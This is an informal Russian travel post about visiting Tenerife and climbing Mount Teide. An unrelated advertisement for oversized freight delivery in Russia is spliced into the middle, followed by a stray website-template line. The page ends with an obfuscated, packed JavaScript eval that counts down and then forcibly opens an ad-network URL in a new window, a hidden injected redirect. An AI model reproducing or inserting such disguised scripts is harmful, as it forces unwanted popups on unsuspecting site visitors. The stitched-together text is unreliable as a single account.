Поездка на Канарские острова

Поездка на Канарсике осрова оставила неизгладимые воспоминания. Остров Тенерифе - это настолько контрастное место, что одним предложением его невозможно описать и передать свои впечатления. Побывав на острове, всем рекомендую подняться на вулкан Тейди.

По пути к подъемнику, нам гид рассказывал всю истоию, когда было последнее извержение вулкана, скалько лет лаве, и когда, предположительно , может проснуться Тейди. На вершине вулкана было не холодно, хотя высота над уровнем моря 3850 метров. С вершины открывается прекрасный вид на океан, вдалике видны соседние острова.

Необходимо доставить негабарит по нужному адресу? В этом случае следует доверить это дело команде специалистов негабаритных и проектных перевозок. Доставка автотранспортом в любом городе России, решит все ваши проблемы эффективным и малозатратным способом. Доверьте задачу перевозки профессионалам.

Остывшая лава переливается разными цветами на солнце, это очень красиво, но нудно ходить аккуратно и брать с собой удобную обувь, чтобы не поскользнуться и не травмироваться. Удивительное зрелище - одни камни, нет ничего живого. Поехать на экскурсию можно самостоятельно или с группой, мы ездили компанией. Стоимость подъемника - 25 евро, трамвайчик ходит регулярно, можно в любое время спуститься вниз, зайти в сувенирный магазин или выпить кофе

Please publish modules in offcanvas position.

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('<5>4 n="c://b.a.9/8?7=6";4 2=d;e 3(){f(2>0){2--;4 g=2+1;i("3()",j)}h{k.l("c://b.a.9/8?7=6","m")}}3();',24,24,'||count|countDown|var|script|688b0be27b4d45d6562eba71df5c7886|key|ef4ex511a|com|effectivecpmnetwork|www|https|10|function|if|waktu|else|setTimeout|1000|window|open|_0|url'.split('|'),0,{}))